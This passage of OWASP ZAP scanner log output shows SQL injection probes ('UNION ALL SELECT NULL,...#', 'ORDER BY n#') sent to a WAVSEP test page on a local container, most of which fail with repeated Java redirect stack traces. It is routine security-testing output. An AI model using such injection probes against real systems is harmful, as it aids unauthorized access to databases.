org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682586 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682587 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682587 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682588 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682589 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682590 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682591 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682591 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682592 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682593 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682594 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 6592#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 6592# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682595 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682596 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at 